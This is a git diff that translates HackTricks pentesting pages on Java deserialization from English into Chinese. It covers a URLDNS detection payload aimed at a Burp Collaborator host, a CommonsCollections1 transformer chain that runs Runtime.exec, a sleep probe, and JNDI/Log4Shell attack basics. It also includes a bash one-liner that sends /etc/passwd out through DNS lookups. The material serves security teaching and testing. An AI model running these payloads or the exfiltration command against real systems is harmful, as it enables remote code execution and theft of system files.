+您可以在 [URDNS 负载代码来自 ysoserial 这里](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)。但是，为了更容易理解如何编码，我创建了我自己的 PoC（基于 ysoserial 的那个）：
 ```java
 import java.io.File;
 import java.io.FileInputStream;
@@ -86,117 +75,113 @@ import java.util.HashMap;
 import java.net.URL;
 
 public class URLDNS {
-	public static void GeneratePayload(Object instance, String file)
-            throws Exception {
-        //Serialize the constructed payload and write it to the file
-        File f = new File(file);
-        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
-        out.writeObject(instance);
-        out.flush();
-        out.close();
-    }
-	public static void payloadTest(String file) throws Exception {
-        //Read the written payload and deserialize it
-        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
-        Object obj = in.readObject();
-        System.out.println(obj);
-        in.close();
-    }
+public static void GeneratePayload(Object instance, String file)
+throws Exception {
+//Serialize the constructed payload and write it to the file
+File f = new File(file);
+ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
+out.writeObject(instance);
+out.flush();
+out.close();
+}
+public static void payloadTest(String file) throws Exception {
+//Read the written payload and deserialize it
+ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
+Object obj = in.readObject();
+System.out.println(obj);
+in.close();
+}
 
-	public static void main(final String[] args) throws Exception {
-		String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
-		HashMap ht = new HashMap(); // HashMap that will contain the URL
-		URLStreamHandler handler = new SilentURLStreamHandler();
-    URL u = new URL(null, url, handler); // URL to use as the Key
-    ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
+public static void main(final String[] args) throws Exception {
+String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
+HashMap ht = new HashMap(); // HashMap that will contain the URL
+URLStreamHandler handler = new SilentURLStreamHandler();
+URL u = new URL(null, url, handler); // URL to use as the Key
+ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
 
-    // During the put above, the URL's hashCode is calculated and cached.
-    // This resets that so the next time hashCode is called a DNS lookup will be triggered.
-    final Field field = u.getClass().getDeclaredField("hashCode");
-    field.setAccessible(true);
-		field.set(u, -1);
+// During the put above, the URL's hashCode is calculated and cached.
+// This resets that so the next time hashCode is called a DNS lookup will be triggered.
+final Field field = u.getClass().getDeclaredField("hashCode");
+field.setAccessible(true);
+field.set(u, -1);
 
-		//Test the payloads
-		GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
-	}
+//Test the payloads
+GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
+}
 }
 
 
 class SilentURLStreamHandler extends URLStreamHandler {
 
-    protected URLConnection openConnection(URL u) throws IOException {
-        return null;
-    }
+protected URLConnection openConnection(URL u) throws IOException {
+return null;
+}
 
-    protected synchronized InetAddress getHostAddress(URL u) {
-        return null;
-    }
+protected synchronized InetAddress getHostAddress(URL u) {
+return null;
+}
 }
 ```
-
-### More information
+### 更多信息
 
 - [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
-- In the original idea thee commons collections payload was changed to perform a DNS query, this was less reliable that the proposed method, but this is the post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
+- 在最初的想法中，commons collections 负载被更改为执行 DNS 查询，这比提议的方法不太可靠，但这是文章：[https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
 
 ## GadgetProbe
 
-You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) from the Burp Suite App Store (Extender).
+您可以从 Burp Suite 应用商店（Extender）下载 [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe)。
 
-**GadgetProbe** will try to figure out if some **Java classes exist** on the Java class of the server so you can know **if** it's **vulnerable** to some known exploit.
+**GadgetProbe** 将尝试确定服务器的 Java 类中是否存在某些 **Java 类**，以便您可以知道 **是否** 它 **易受** 某些已知漏洞的攻击。
 
-### How does it work
+### 它是如何工作的
 
-**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
+**GadgetProbe** 将使用上一节的 **DNS 负载**，但在运行 DNS 查询之前，它将 **尝试反序列化一个任意类**。如果 **任意类存在**，则 **DNS 查询** 将被 **发送**，GadgetProbe 将记录该类存在。如果 **DNS** 请求 **从未发送**，这意味着 **任意类未成功反序列化**，因此它要么不存在，要么 **不可序列化/不可利用**。
 
-Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
+在 GitHub 中，[**GadgetProbe 有一些字典**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) 用于测试的 Java 类。
 
 ![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../images/intruder4 (1) (1).gif>)
 
-### More Information
+### 更多信息
 
 - [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
 
-## Java Deserialization Scanner
+## Java 反序列化扫描仪
 
-This scanner can be **download** from the Burp App Store (**Extender**).\
-The **extension** has **passive** and active **capabilities**.
+此扫描仪可以从 Burp 应用商店（**Extender**）**下载**。\
+该 **扩展** 具有 **被动** 和主动 **功能**。
 
-### Passive
+### 被动
 
-By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
+默认情况下，它会 **被动检查** 所有请求和响应，**寻找** **Java 序列化魔法字节**，如果发现任何，将呈现漏洞警告：
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)
 
-### Active
+### 主动
 
-**Manual Testing**
+**手动测试**
 
-You can select a request, right click and `Send request to DS - Manual Testing`.\
-Then, inside the _Deserialization Scanner Tab_ --> _Manual testing tab_ you can select the **insertion point**. And **launch the testing** (Select the appropriate attack depending on the encoding used).
+您可以选择一个请求，右键单击并选择 `Send request to DS - Manual Testing`。\
+然后，在 _Deserialization Scanner Tab_ --> _Manual testing tab_ 中，您可以选择 **插入点**。并 **启动测试**（根据使用的编码选择适当的攻击）。
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/3-1.png)
 
-Even if this is called "Manual testing", it's pretty **automated**. It will automatically check if the **deserialization** is **vulnerable** to **any ysoserial payload** checking the libraries present on the web server and will highlight the ones vulnerable. In order to **check** for **vulnerable libraries** you can select to launch **Javas Sleeps**, **sleeps** via **CPU** consumption, or using **DNS** as it has previously being mentioned.
+即使这被称为“手动测试”，它也是相当 **自动化** 的。它将自动检查 **反序列化** 是否 **易受** **任何 ysoserial 负载** 的攻击，检查 Web 服务器上存在的库，并突出显示易受攻击的库。为了 **检查** **易受攻击的库**，您可以选择启动 **Javas Sleeps**、通过 **CPU** 消耗的 **sleeps**，或使用 **DNS**，正如之前提到的那样。
 
-**Exploiting**
+**利用**
 
-Once you have identified a vulnerable library you can send the request to the _Exploiting Tab_.\
-I this tab you have to **select** the **injection point** again, an **write** the **vulnerable library** you want to create a payload for, and the **command**. Then, just press the appropriate **Attack** button.
+一旦您识别出一个易受攻击的库，您可以将请求发送到 _Exploiting Tab_。\
+在此选项卡中，您必须再次 **选择** **注入点**，并 **写入** 您想要为其创建负载的 **易受攻击库** 和 **命令**。然后，只需按下适当的 **攻击** 按钮。
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)
 
-### Java Deserialization DNS Exfil information
-
-Make your payload execute something like the following:
+### Java 反序列化 DNS 外泄信息
 
+使您的负载执行类似以下内容：
 ```bash
 (i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
 ```
-
-### More Information
+### 更多信息
 
 - [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
index 6dc262757..73a97a2dd 100644
--- a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
+++ b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
@@ -1,9 +1,8 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-Check the posts:
+检查帖子：
 
 - [https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
 - [https://0xrick.github.io/hack-the-box/arkham/](https://0xrick.github.io/hack-the-box/arkham/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index 846fdcd2e..bf8b07fc1 100644
--- a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -4,8 +4,7 @@
 
 ## Java Transformers to Rutime exec()
 
-In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
-
+在多个地方，您可以找到一个使用来自Apache common collections的transformers的java反序列化payload，如下所示：
 ```java
 import org.apache.commons.*;
 import org.apache.commons.collections.*;
@@ -17,168 +16,148 @@ import java.util.Map;
 import java.util.HashMap;
 
 public class CommonsCollections1PayloadOnly {
-    public static void main(String... args) {
-        String[] command = {"calc.exe"};
-        final Transformer[] transformers = new Transformer[]{
-                new ConstantTransformer(Runtime.class), //(1)
-                new InvokerTransformer("getMethod",
-                        new Class[]{ String.class, Class[].class},
-                        new Object[]{"getRuntime", new Class[0]}
-                ), //(2)
-                new InvokerTransformer("invoke",
-                        new Class[]{Object.class, Object[].class},
-                        new Object[]{null, new Object[0]}
-                ), //(3)
-                new InvokerTransformer("exec",
-                        new Class[]{String.class},
-                        command
-                ) //(4)
-        };
-        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
-        Map map = new HashMap<>();
-        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
+public static void main(String... args) {
+String[] command = {"calc.exe"};
+final Transformer[] transformers = new Transformer[]{
+new ConstantTransformer(Runtime.class), //(1)
+new InvokerTransformer("getMethod",
+new Class[]{ String.class, Class[].class},
+new Object[]{"getRuntime", new Class[0]}
+), //(2)
+new InvokerTransformer("invoke",
+new Class[]{Object.class, Object[].class},
+new Object[]{null, new Object[0]}
+), //(3)
+new InvokerTransformer("exec",
+new Class[]{String.class},
+command
+) //(4)
+};
+ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+Map map = new HashMap<>();
+Map lazyMap = LazyMap.decorate(map, chainedTransformer);
 
-        //Execute gadgets
-        lazyMap.get("anything");
-    }
+//Execute gadgets
+lazyMap.get("anything");
+}
 }
 ```
+如果你对 Java 反序列化有效载荷一无所知，可能很难弄清楚为什么这段代码会执行一个计算器。
 
-If you don't know anything about java deserialization payloads could be difficult to figure out why this code will execute a calc.
-
-First of all you need to know that a **Transformer in Java** is something that **receives a class** and **transforms it to a different one**.\
-Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:
-
+首先，你需要知道 **Java 中的 Transformer** 是指 **接收一个类** 并 **将其转换为另一个类** 的东西。\
+此外，值得注意的是，这里被 **执行** 的 **有效载荷** 是 **等同于**：
 ```java
 Runtime.getRuntime().exec(new String[]{"calc.exe"});
 ```
-
-Or **more exactly**, what is going to be executed at the end would be:
-
+或者**更准确地**说，最后将被执行的是：
 ```java
 ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
 ```
+### 如何
 
-### How
-
-So, how is the first payload presented equivalent to those "simple" one-liners?
-
-**First** of all, you can notice in the payload that a **chain (array) of transforms are created**:
+那么，为什么第一个有效载荷呈现的形式等同于那些“简单”的单行代码呢？
 
+**首先**，您可以注意到在有效载荷中创建了一个 **变换链（数组）**：
 ```java
 String[] command = {"calc.exe"};
 final Transformer[] transformers = new Transformer[]{
-        //(1) - Get gadget Class (from Runtime class)
-        new ConstantTransformer(Runtime.class),
+//(1) - Get gadget Class (from Runtime class)
+new ConstantTransformer(Runtime.class),
 
-        //(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
-        new InvokerTransformer("getMethod",
-                new Class[]{ String.class, Class[].class},
-                new Object[]{"getRuntime", new Class[0]}
-        ),
+//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
+new InvokerTransformer("getMethod",
+new Class[]{ String.class, Class[].class},
+new Object[]{"getRuntime", new Class[0]}
+),
 
-        //(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
-        new InvokerTransformer("invoke",
-                new Class[]{Object.class, Object[].class},
-                new Object[]{null, new Object[0]}
-        ),
+//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
+new InvokerTransformer("invoke",
+new Class[]{Object.class, Object[].class},
+new Object[]{null, new Object[0]}
+),
 
-        //(4) - Use the Runtime object to call exec with arbitrary commands
-        new InvokerTransformer("exec",
-                new Class[]{String.class},
-                command
-        )
+//(4) - Use the Runtime object to call exec with arbitrary commands
+new InvokerTransformer("exec",
+new Class[]{String.class},
+command
+)
 };
 ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
 ```
+如果你阅读代码，你会注意到，如果你以某种方式链接数组的转换，你将能够执行任意命令。
 
-If you read the code you will notice that if you somehow chains the transformation of the array you could be able to execute arbitrary commands.
-
-So, **how are those transforms chained?**
-
+那么，**这些转换是如何链接的？**
 ```java
 Map map = new HashMap<>();
 Map lazyMap = LazyMap.decorate(map, chainedTransformer);
 lazyMap.get("anything");
 ```
-
-In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute:
-
+在有效负载的最后部分，您可以看到一个 **Map 对象被创建**。然后，从 `LazyMap` 执行函数 `decorate`，传入 map 对象和链式转换器。从以下代码可以看出，这将导致 **链式转换器** 被复制到 `lazyMap.factory` 属性中：
 ```java
 protected LazyMap(Map map, Transformer factory) {
-    super(map);
-    if (factory == null) {
-        throw new IllegalArgumentException("Factory must not be null");
-    }
-    this.factory = factory;
+super(map);
+if (factory == null) {
+throw new IllegalArgumentException("Factory must not be null");
+}
+this.factory = factory;
 }
 ```
+然后伟大的结局被执行： `lazyMap.get("anything");`
 
-And then the great finale is executed: `lazyMap.get("anything");`
-
-This is the code of the `get` function:
-
+这是 `get` 函数的代码：
 ```java
 public Object get(Object key) {
-    if (map.containsKey(key) == false) {
-        Object value = factory.transform(key);
-        map.put(key, value);
-        return value;
-    }
-    return map.get(key);
+if (map.containsKey(key) == false) {
+Object value = factory.transform(key);
+map.put(key, value);
+return value;
+}
+return map.get(key);
 }
 ```
-
-And this is the code of the `transform` function
-
+这是 `transform` 函数的代码
 ```java
 public Object transform(Object object) {
-    for (int i = 0; i < iTransformers.length; i++) {
-        object = iTransformers[i].transform(object);
-    }
-    return object;
+for (int i = 0; i < iTransformers.length; i++) {
+object = iTransformers[i].transform(object);
+}
+return object;
 }
 ```
+所以，请记住，在 **factory** 中我们保存了 **`chainedTransformer`**，在 **`transform`** 函数中，我们 **遍历所有这些链式变换器** 并一个接一个地执行。 有趣的是，**每个变换器都使用 `object`** **作为输入**，而 **object 是上一个执行的变换器的输出**。 因此，**所有变换都是链式执行恶意有效负载**。
 
-So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
-
-### Summary
-
-At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
+### 摘要
 
+最后，由于 lazyMap 在 get 方法中管理链式变换器的方式，就像我们在执行以下代码一样：
 ```java
 Object value = "someting";
 
 value = new ConstantTransformer(Runtime.class).transform(value); //(1)
 
 value = new InvokerTransformer("getMethod",
-                new Class[]{ String.class, Class[].class},
-                new Object[]{"getRuntime", null}
-        ).transform(value); //(2)
+new Class[]{ String.class, Class[].class},
+new Object[]{"getRuntime", null}
+).transform(value); //(2)
 
 value = new InvokerTransformer("invoke",
-                new Class[]{Object.class, Object[].class},
-                new Object[]{null, new Object[0]}
-        ).transform(value); //(3)
+new Class[]{Object.class, Object[].class},
+new Object[]{null, new Object[0]}
+).transform(value); //(3)
 
 value = new InvokerTransformer("exec",
-                new Class[]{String.class},
-                command
-        ).transform(value); //(4)
+new Class[]{String.class},
+command
+).transform(value); //(4)
 ```
-
-_Note how `value` is the input of each transform and the output of the previous transform , allowing the execution of a one-liner:_
-
+_注意 `value` 是每个转换的输入和前一个转换的输出，从而允许执行一行代码：_
 ```java
 ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
 ```
+注意，这里**解释了用于**ComonsCollections1**有效负载的工具**。但**如何开始执行这一切**仍然没有说明。你可以在[这里看到**ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java)，为了执行这个有效负载，它使用了一个`AnnotationInvocationHandler`对象，因为**当这个对象被反序列化时**，它将**调用**`payload.get()`函数，这将**执行整个有效负载**。
 
-Note that here it **was explained the gadgets** used for the **ComonsCollections1** payload. But it's left **how all this starts it's executing**. You can see [here that **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized**, it will **invoke** the `payload.get()` function that will **execute the whole payload**.
-
-## Java Thread Sleep
-
-This payload could be **handy to identify if the web is vulnerable as it will execute a sleep if it is**.
+## Java 线程休眠
 
+这个有效负载可能**有助于识别网站是否存在漏洞，因为如果存在漏洞，它将执行休眠**。
 ```java
 import org.apache.commons.*;
 import org.apache.commons.collections.*;
@@ -192,41 +171,39 @@ import java.util.Map;
 import java.util.HashMap;
 
 public class CommonsCollections1Sleep {
-    public static void main(String... args) {
-        final Transformer[] transformers = new Transformer[]{
-        		new ConstantTransformer(Thread.class),
-        		new InvokerTransformer("getMethod",
-        		        new Class[]{
-        		                String.class, Class[].class
-        		        },
-        		        new Object[]{
-        		                "sleep", new Class[]{Long.TYPE}
-        		        }),
-        		new InvokerTransformer("invoke",
-        		        new Class[]{
-        		                Object.class, Object[].class
-        		        }, new Object[]
-        		        {
-        		                null, new Object[] {7000L}
-        		        }),
-        };
+public static void main(String... args) {
+final Transformer[] transformers = new Transformer[]{
+new ConstantTransformer(Thread.class),
+new InvokerTransformer("getMethod",
+new Class[]{
+String.class, Class[].class
+},
+new Object[]{
+"sleep", new Class[]{Long.TYPE}
+}),
+new InvokerTransformer("invoke",
+new Class[]{
+Object.class, Object[].class
+}, new Object[]
+{
+null, new Object[] {7000L}
+}),
+};
 
-        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
-        Map map = new HashMap<>();
-        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
+ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+Map map = new HashMap<>();
+Map lazyMap = LazyMap.decorate(map, chainedTransformer);
 
-        //Execute gadgets
-        lazyMap.get("anything");
+//Execute gadgets
+lazyMap.get("anything");
 
-    }
+}
 }
 ```
+## 更多小工具
 
-## More Gadgets
-
-You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
+您可以在这里找到更多小工具： [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
 
 ##
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index fefa1e9a5..601306600 100644
--- a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -2,159 +2,156 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-JNDI, integrated into Java since the late 1990s, serves as a directory service, enabling Java programs to locate data or objects through a naming system. It supports various directory services via service provider interfaces (SPIs), allowing data retrieval from different systems, including remote Java objects. Common SPIs include CORBA COS, Java RMI Registry, and LDAP.
+JNDI，自1990年代末以来集成到Java中，作为目录服务，使Java程序能够通过命名系统定位数据或对象。它通过服务提供者接口（SPIs）支持各种目录服务，允许从不同系统检索数据，包括远程Java对象。常见的SPIs包括CORBA COS、Java RMI Registry和LDAP。
 
-### JNDI Naming Reference
+### JNDI命名参考
 
-Java objects can be stored and retrieved using JNDI Naming References, which come in two forms:
+Java对象可以使用JNDI命名引用进行存储和检索，形式有两种：
 
-- **Reference Addresses**: Specifies an object's location (e.g., _rmi://server/ref_), allowing direct retrieval from the specified address.
-- **Remote Factory**: References a remote factory class. When accessed, the class is downloaded and instantiated from the remote location.
+- **引用地址**：指定对象的位置（例如，_rmi://server/ref_），允许直接从指定地址检索。
+- **远程工厂**：引用一个远程工厂类。当访问时，该类会从远程位置下载并实例化。
 
-However, this mechanism can be exploited, potentially leading to the loading and execution of arbitrary code. As a countermeasure:
+然而，这种机制可能被利用，可能导致加载和执行任意代码。作为对策：
 
-- **RMI**: `java.rmi.server.useCodeabseOnly = true` by default from JDK 7u21, restricting remote object loading. A Security Manager further limits what can be loaded.
-- **LDAP**: `com.sun.jndi.ldap.object.trustURLCodebase = false` by default from JDK 6u141, 7u131, 8u121, blocking the execution of remotely loaded Java objects. If set to `true`, remote code execution is possible without a Security Manager's oversight.
-- **CORBA**: Doesn't have a specific property, but the Security Manager is always active.
+- **RMI**：`java.rmi.server.useCodeabseOnly = true` 从JDK 7u21开始默认启用，限制远程对象加载。安全管理器进一步限制可以加载的内容。
+- **LDAP**：`com.sun.jndi.ldap.object.trustURLCodebase = false` 从JDK 6u141、7u131、8u121开始默认启用，阻止执行远程加载的Java对象。如果设置为`true`，则可以在没有安全管理器监督的情况下进行远程代码执行。
+- **CORBA**：没有特定属性，但安全管理器始终处于活动状态。
 
-However, the **Naming Manager**, responsible for resolving JNDI links, lacks built-in security mechanisms, potentially allowing the retrieval of objects from any source. This poses a risk as RMI, LDAP, and CORBA protections can be circumvented, leading to the loading of arbitrary Java objects or exploiting existing application components (gadgets) to run malicious code.
+然而，负责解析JNDI链接的**命名管理器**缺乏内置安全机制，可能允许从任何来源检索对象。这构成风险，因为RMI、LDAP和CORBA的保护措施可能被绕过，导致加载任意Java对象或利用现有应用组件（小工具）运行恶意代码。
 
-Examples of exploitable URLs include:
+可利用的URL示例包括：
 
 - _rmi://attacker-server/bar_
 - _ldap://attacker-server/bar_
 - _iiop://attacker-server/bar_
 
-Despite protections, vulnerabilities remain, mainly due to the lack of safeguards against loading JNDI from untrusted sources and the possibility of bypassing existing protections.
+尽管有保护措施，漏洞仍然存在，主要是由于缺乏对从不受信任来源加载JNDI的保护以及绕过现有保护的可能性。
 
-### JNDI Example
+### JNDI示例
 
 ![](<../../images/image (1022).png>)
 
-Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
+即使您已设置**`PROVIDER_URL`**，您仍可以在查找中指示不同的URL，并将其访问：`ctx.lookup("<attacker-controlled-url>")`，这就是攻击者将利用的内容，从他控制的系统加载任意对象。
 
-### CORBA Overview
+### CORBA概述
 
-CORBA (Common Object Request Broker Architecture) employs an **Interoperable Object Reference (IOR)** to uniquely identify remote objects. This reference includes essential information like:
+CORBA（通用对象请求代理架构）使用**可互操作对象引用（IOR）**唯一标识远程对象。此引用包含关键信息，如：
 
-- **Type ID**: Unique identifier for an interface.
-- **Codebase**: URL for obtaining the stub class.
+- **类型ID**：接口的唯一标识符。
+- **代码库**：获取存根类的URL。
 
-Notably, CORBA isn't inherently vulnerable. Ensuring security typically involves:
+值得注意的是，CORBA本身并不脆弱。确保安全通常涉及：
 
-- Installation of a **Security Manager**.
-- Configuring the Security Manager to permit connections to potentially malicious codebases. This can be achieved through:
-  - Socket permission, e.g., `permissions java.net.SocketPermission "*:1098-1099", "connect";`.
-  - File read permissions, either universally (`permission java.io.FilePermission "<<ALL FILES>>", "read";`) or for specific directories where malicious files might be placed.
+- 安装**安全管理器**。
+- 配置安全管理器以允许连接到潜在恶意的代码库。这可以通过以下方式实现：
+- 套接字权限，例如，`permissions java.net.SocketPermission "*:1098-1099", "connect";`。
+- 文件读取权限，可以是通用的（`permission java.io.FilePermission "<<ALL FILES>>", "read";`）或针对可能放置恶意文件的特定目录。
 
-However, some vendor policies might be lenient and allow these connections by default.
+然而，一些供应商政策可能会宽松，默认允许这些连接。
 
-### RMI Context
+### RMI上下文
 
-For RMI (Remote Method Invocation), the situation is somewhat different. As with CORBA, arbitrary class downloading is restricted by default. To exploit RMI, one would typically need to circumvent the Security Manager, a feat also relevant in CORBA.
+对于RMI（远程方法调用），情况有所不同。与CORBA一样，默认情况下限制任意类下载。要利用RMI，通常需要绕过安全管理器，这在CORBA中也同样适用。
 
 ### LDAP
 
-First of all, wee need to distinguish between a Search and a Lookup.\
-A **search** will use an URL like `ldap://localhost:389/o=JNDITutorial` to find the JNDITutorial object from an LDAP server and **retreive its attributes**.\
-A **lookup** is meant for **naming services** as we want to get **whatever is bound to a name**.
+首先，我们需要区分搜索和查找。\
+**搜索**将使用类似`ldap://localhost:389/o=JNDITutorial`的URL从LDAP服务器查找JNDITutorial对象并**检索其属性**。\
+**查找**旨在用于**命名服务**，因为我们想获取**绑定到名称的任何内容**。
 
-If the LDAP search was invoked with **SearchControls.setReturningObjFlag() with `true`, then the returned object will be reconstructed**.
+如果LDAP搜索是通过**SearchControls.setReturningObjFlag()**调用的，并且设置为`true`，则返回的对象将被重建。
 
-Therefore, there are several ways to attack these options.\
-An **attacker may poison LDAP records introducing payloads** on them that will be executed in the systems that gather them (very useful to **compromise tens of machines** if you have access to the LDAP server). Another way to exploit this would be to perform a **MitM attack in a LDAP searc**h for example.
+因此，有几种方法可以攻击这些选项。\
+**攻击者可能会通过在LDAP记录中引入有效负载来污染它们**，这些有效负载将在收集它们的系统中执行（如果您可以访问LDAP服务器，这非常有用，可以**妥协数十台机器**）。另一种利用此漏洞的方法是执行**LDAP搜索中的MitM攻击**。
 
-In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDAP that will be searched, and you could send back the exploit (log4shell).
+如果您可以**使应用程序解析JNDI LDAP URL**，您可以控制将要搜索的LDAP，并可以返回利用代码（log4shell）。
 
-#### Deserialization exploit
+#### 反序列化利用
 
 ![](<../../images/image (275).png>)
 
-The **exploit is serialized** and will be deserialized.\
-In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
+**利用是序列化的**，并将被反序列化。\
+如果`trustURLCodebase`为`true`，攻击者可以在代码库中提供自己的类；如果不是，他将需要利用类路径中的小工具。
 
-#### JNDI Reference exploit
+#### JNDI引用利用
 
-It's easier to attack this LDAP using **JavaFactory references**:
+使用**JavaFactory引用**攻击此LDAP更容易：
 
 ![](<../../images/image (1059).png>)
 
-## Log4Shell Vulnerability
+## Log4Shell漏洞
 
-The vulnerability is introduced in Log4j because it supports a [**special syntax**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution) in the form `${prefix:name}` where `prefix` is one of a number of different [**Lookups**](https://logging.apache.org/log4j/2.x/manual/lookups.html) where `name` should be evaluated. For example, `${java:version}` is the current running version of Java.
+该漏洞在Log4j中引入，因为它支持一种[**特殊语法**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution)，形式为`${prefix:name}`，其中`prefix`是多个不同的[**查找**](https://logging.apache.org/log4j/2.x/manual/lookups.html)之一，`name`应被评估。例如，`${java:version}`是当前运行的Java版本。
 
-[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313) introduced a `jndi` Lookup feature. This feature enables the retrieval of variables through JNDI. Typically, the key is automatically prefixed with `java:comp/env/`. However, if the key itself includes a **":"**, this default prefix is not applied.
+[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313)引入了`jndi`查找功能。此功能允许通过JNDI检索变量。通常，键会自动以`java:comp/env/`为前缀。但是，如果键本身包含**":"**，则不会应用此默认前缀。
 
